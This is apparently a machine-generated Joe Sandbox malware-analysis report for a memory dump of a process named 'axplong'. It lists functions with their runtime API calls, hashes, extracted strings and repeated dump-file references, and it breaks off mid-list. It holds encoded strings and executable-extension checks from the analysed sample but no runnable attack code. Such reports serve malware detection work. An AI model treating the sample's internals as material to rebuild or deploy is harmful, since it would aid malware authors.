Instruction Fuzzy Hash: 8021B673F204394B770CC47E8C5727DB6E1C68C541745423AE8A6EA2C1D968D917E2E4

Function 0026765B Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Offset: 00220000, based on PE: true

Associated: 00000005.00000002.3450871073.0000000000220000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3450902029.0000000000282000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3450991567.0000000000289000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000028B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.00000000004E8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.0000000000517000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000051E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000052D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453445002.000000000052E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453586085.00000000006C3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453609962.00000000006C4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453634749.00000000006C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453658601.00000000006C6000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_220000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b34ae0a2d3266ea3389030542d0e9a162f83950f2f8a8d7d9237617a1940c93
Instruction ID: 066ed02187b067c363e5f2a90124826f70b1de1faa6ec0b527ce7f78077c9b77
Opcode Fuzzy Hash: 3b34ae0a2d3266ea3389030542d0e9a162f83950f2f8a8d7d9237617a1940c93
Instruction Fuzzy Hash: A011A323F30C255A675C816D8C172BAA1D6EBD824031F433AD826EB284E9A4DE23D290

Function 00268720 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Offset: 00220000, based on PE: true

Associated: 00000005.00000002.3450871073.0000000000220000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3450902029.0000000000282000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3450991567.0000000000289000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000028B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.00000000004E8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.0000000000517000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000051E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000052D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453445002.000000000052E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453586085.00000000006C3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453609962.00000000006C4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453634749.00000000006C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453658601.00000000006C6000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_220000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: e6579cdc18c3216c9b92e51bdae4d00f02ceb919079ef70e03675ce9bb1ab614
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: F811387F22014347D6068E2DC8F46B6E796EAC5321B3C437AC1414B758DE22A9E4D900

Function 0025645B Relevance: .0, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Offset: 00220000, based on PE: true

Associated: 00000005.00000002.3450871073.0000000000220000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3450902029.0000000000282000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3450991567.0000000000289000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000028B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.00000000004E8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.0000000000517000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000051E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000052D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453445002.000000000052E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453586085.00000000006C3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453609962.00000000006C4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453634749.00000000006C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453658601.00000000006C6000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_220000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 083a0729048cb507e29ab938b33108d54ba35a576d4befb6a4e8ec9df00c768d
Instruction ID: 0415830f266f4c1ec7fcccbe654430c356bb865e9c0a3ed3dc38d67e5f9b4408
Opcode Fuzzy Hash: 083a0729048cb507e29ab938b33108d54ba35a576d4befb6a4e8ec9df00c768d
Instruction Fuzzy Hash: 0DE08C31060A496FCE357F15C81DE983B6AEB0139AF908800FC084B221CB75ECA5DA84

Function 0025A1C2 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Offset: 00220000, based on PE: true

Associated: 00000005.00000002.3450871073.0000000000220000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3450902029.0000000000282000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3450991567.0000000000289000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000028B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.00000000004E8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.0000000000517000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000051E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000052D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453445002.000000000052E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453586085.00000000006C3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453609962.00000000006C4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453634749.00000000006C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453658601.00000000006C6000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_220000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction ID: b8c5b3e973cdbe8179101c3d8cf01609f6752db7b6337667e3dd0f3ab159cba4
Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction Fuzzy Hash: E8E08C32921628EBCB15DBC8C905D8AF7ECEB48B11F158196F905E3240C2B0DF04CBD8

Function 00232E20 Relevance: 17.9, APIs: 3, Strings: 7, Instructions: 434COMMON

Download Yara Rule

Strings

8KG0fymoFx==, xrefs: 00232EC7
WGt=, xrefs: 002333BA
stoi argument out of range, xrefs: 00234269
246122658369, xrefs: 002333D4
invalid stoi argument, xrefs: 0023425A
Fz==, xrefs: 0023369E
HBhr, xrefs: 0023378F

Memory Dump Source

Source File: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Offset: 00220000, based on PE: true

Associated: 00000005.00000002.3450871073.0000000000220000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3450902029.0000000000282000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3450991567.0000000000289000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000028B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.00000000004E8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.0000000000517000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000051E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000052D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453445002.000000000052E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453586085.00000000006C3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453609962.00000000006C4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453634749.00000000006C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453658601.00000000006C6000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_220000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: 246122658369$8KG0fymoFx==$Fz==$HBhr$WGt=$invalid stoi argument$stoi argument out of range
API String ID: 0-2390467879
Opcode ID: 44a580a0cc6fb31d069299155ecb46850dee806ca71b1c7c7082c72b67337c38
Instruction ID: 7ce26d9021094c629510a6571cff6483b592186a2ea23d2eed3f5379e82d0cf0
Opcode Fuzzy Hash: 44a580a0cc6fb31d069299155ecb46850dee806ca71b1c7c7082c72b67337c38
Instruction Fuzzy Hash: 9602C4B1920258EFEF14EFA8C849BDEBBB5EF05304F504158E805A7282D7759B94CFA1

Function 00237870 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 123COMMON

Download Yara Rule

APIs

__Cnd_unregister_at_thread_exit.LIBCPMT ref: 0023795C
__Cnd_destroy_in_situ.LIBCPMT ref: 00237968
__Mtx_destroy_in_situ.LIBCPMT ref: 00237971

Strings

d+(, xrefs: 00237904, 00237912, 0023790A
@y#, xrefs: 0023794A
'k#d+(, xrefs: 00237879, 0023790B

Memory Dump Source

Source File: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Offset: 00220000, based on PE: true

Associated: 00000005.00000002.3450871073.0000000000220000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3450902029.0000000000282000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3450991567.0000000000289000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000028B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.00000000004E8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.0000000000517000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000051E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000052D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453445002.000000000052E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453586085.00000000006C3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453609962.00000000006C4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453634749.00000000006C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453658601.00000000006C6000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_220000_axplong.jbxd

Yara matches

Similarity

API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situ
String ID: 'k#d+($@y#$d+(
API String ID: 4078500453-556721154
Opcode ID: 57641f2b168db26f60f7ad5537b045b4135edcd0848f4bf315381119147eb550
Instruction ID: b84005f1db6930c89d2516156a03c6e82a5ea34ad6edecc0d94a125ce88d8f97
Opcode Fuzzy Hash: 57641f2b168db26f60f7ad5537b045b4135edcd0848f4bf315381119147eb550
Instruction Fuzzy Hash: DC31E5F29243059FDB30DF64E845B56B7E8EF14310F100A2EE945C7241E771EA64CBA1

Function 002570C9 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON

Download Yara Rule

APIs

_wcsrchr.LIBVCRUNTIME ref: 0025710B

Strings

.com, xrefs: 0025714B
.cmd, xrefs: 00257129
.bat, xrefs: 0025713A
.exe, xrefs: 00257118

Memory Dump Source

Source File: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Offset: 00220000, based on PE: true

Associated: 00000005.00000002.3450871073.0000000000220000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3450902029.0000000000282000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3450991567.0000000000289000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000028B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.00000000004E8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.0000000000517000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000051E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000052D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453445002.000000000052E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453586085.00000000006C3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453609962.00000000006C4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453634749.00000000006C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453658601.00000000006C6000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_220000_axplong.jbxd

Yara matches

Similarity

API ID: _wcsrchr
String ID: .bat$.cmd$.com$.exe
API String ID: 1752292252-4019086052
Opcode ID: bb57f53fa10fd64e0d1cbcb77d9aac3a451ff0c85f782679051c250bbfc08fa7
Instruction ID: 857cfc4f1e7e2453f94f92521d831cf9571953269cec9394edb03f8941105b56
Opcode Fuzzy Hash: bb57f53fa10fd64e0d1cbcb77d9aac3a451ff0c85f782679051c250bbfc08fa7
Instruction Fuzzy Hash: F00142776786132216191819BC0263B17889B83BB5B15401BFD4CF73C1DE74EC794958

Function 00222E80 Relevance: 7.8, APIs: 5, Instructions: 272COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00222F1F
__Mtx_unlock.LIBCPMT ref: 00222F8C
__Cnd_broadcast.LIBCPMT ref: 00222FA3
__Mtx_unlock.LIBCPMT ref: 002230B5
__Mtx_unlock.LIBCPMT ref: 0022315B

Memory Dump Source

Source File: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Offset: 00220000, based on PE: true

Associated: 00000005.00000002.3450871073.0000000000220000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3450902029.0000000000282000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3450991567.0000000000289000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000028B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.00000000004E8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.0000000000517000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000051E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000052D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453445002.000000000052E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453586085.00000000006C3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453609962.00000000006C4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453634749.00000000006C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453658601.00000000006C6000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_220000_axplong.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Cnd_broadcast
String ID:
API String ID: 32384418-0
Opcode ID: d5dc02a273ce47b0c6c65175e8f53775677c9795cf72ceee497bf252303f43bf
Instruction ID: 7a20c4b415c5a23b092c9244642ca4a7431d35529180240affaacb6180e0ffce
Opcode Fuzzy Hash: d5dc02a273ce47b0c6c65175e8f53775677c9795cf72ceee497bf252303f43bf
Instruction Fuzzy Hash: FFA1F3B0920326EFDB11DFA4D94579AB7B8FF15310F104129E819E7641EB35EA28CBD1

Function 00222670 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 207COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00222806
___std_exception_destroy.LIBVCRUNTIME ref: 002228A0

Strings

P#", xrefs: 002227BE, 00222899
P#", xrefs: 00222811

Memory Dump Source

Source File: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Offset: 00220000, based on PE: true

Associated: 00000005.00000002.3450871073.0000000000220000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3450902029.0000000000282000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3450991567.0000000000289000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000028B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.00000000004E8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.0000000000517000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000051E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000052D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453445002.000000000052E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453586085.00000000006C3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453609962.00000000006C4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453634749.00000000006C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453658601.00000000006C6000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_220000_axplong.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy___std_exception_destroy
String ID: P#"$P#"
API String ID: 2970364248-2896502121
Opcode ID: fd97e78eb59343eb2c2b4bbf2fe4fbc52ac1dbdd89bac6f62fa144e02e4ffd63
Instruction ID: ba110e0042a77914fc4872160e7763eef73e0c1c886db88a09521c9b03d22f41
Opcode Fuzzy Hash: fd97e78eb59343eb2c2b4bbf2fe4fbc52ac1dbdd89bac6f62fa144e02e4ffd63
Instruction Fuzzy Hash: 0771A171E20218EBDB04CFA8D881BDDFBB4EF58310F54811DE805A7281EB75A954CBA5

Function 00222AD0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 51COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00222B23

Strings

P#", xrefs: 00222B2E
This function cannot be called on a default constructed task, xrefs: 00222B03
P#", xrefs: 00222B18

Memory Dump Source

Source File: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Offset: 00220000, based on PE: true

Associated: 00000005.00000002.3450871073.0000000000220000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3450902029.0000000000282000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3450991567.0000000000289000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000028B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.00000000004E8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.0000000000517000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000051E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000052D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453445002.000000000052E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453586085.00000000006C3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453609962.00000000006C4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453634749.00000000006C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453658601.00000000006C6000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_220000_axplong.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: P#"$P#"$This function cannot be called on a default constructed task
API String ID: 2659868963-2998974727
Opcode ID: af8ae61c58b12c7b846ec5aff722558232ed35eaab8ad6db81d0c034559f8617
Instruction ID: 291b139847d269c33fcd17ffa19109e1be6e3d131e1beb9c7b96c66192e8cab1
Opcode Fuzzy Hash: af8ae61c58b12c7b846ec5aff722558232ed35eaab8ad6db81d0c034559f8617
Instruction Fuzzy Hash: D9F09670D3030CABC714DFA8A84199EF7EDDF15300F5081AEF848A7601EB71AA688B95

Function 00222440 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 32COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 0022247E

Strings

P#", xrefs: 0022246D
'k#d+(, xrefs: 00222440
P#", xrefs: 00222486

Memory Dump Source

Source File: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Offset: 00220000, based on PE: true

Associated: 00000005.00000002.3450871073.0000000000220000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3450902029.0000000000282000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3450991567.0000000000289000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000028B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.00000000004E8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.0000000000517000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000051E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000052D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453445002.000000000052E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453586085.00000000006C3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453609962.00000000006C4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453634749.00000000006C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453658601.00000000006C6000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_220000_axplong.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: 'k#d+($P#"$P#"
API String ID: 2659868963-3723187383
Opcode ID: 9df985d4579ec157d5401926298dd56e5b1aaa00ab3f1b827a1fd6d6c705a271
Instruction ID: 27d98224efad60d437139ea30533f8c87efe5b37009a8aa7cdfb4d6e72e5f77e
Opcode Fuzzy Hash: 9df985d4579ec157d5401926298dd56e5b1aaa00ab3f1b827a1fd6d6c705a271
Instruction Fuzzy Hash: 41F0E5B6D3020DA7C714FFE4D841889B3ACDE15340B408A25FA44EB500F7B0FA6C8B96

Function 0025C9B0 Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0025CA37

Memory Dump Source

Source File: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Offset: 00220000, based on PE: true

Associated: 00000005.00000002.3450871073.0000000000220000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3450902029.0000000000282000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3450991567.0000000000289000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000028B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.00000000004E8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.0000000000517000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000051E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3451017318.000000000052D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453445002.000000000052E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453586085.00000000006C3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453609962.00000000006C4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453634749.00000000006C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3453658601.00000000006C6000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_220000_axplong.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
Instruction ID: c19ab86e7ff80246ab34c2cb75e398099d9ff19b43fcfedc9eea56de4bbb47c0
Opcode Fuzzy Hash: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
Instruction Fuzzy Hash: 94B136329203469FDB15CF28C8817AEBBF5EF55306F2481AADC459B341E6348D59CB68

Function 0023BAA2 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 0023BAFA
__Xtime_diff_to_millis2.LIBCPMT ref: 0023BB14
_xtime_get.LIBCPMT ref: 0023BB37
__Xtime_diff_to_millis2.LIBCPMT ref: 0023BB43

Memory Dump Source

Source File: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Offset: 00220000, based on PE: true

Associated: 00000005.00000002.3450871073.0000000000220000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3450902029.0000000000282000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3450991567.0000000000289000.00000004.00000001.01000000.00000007.sdmpDownload File
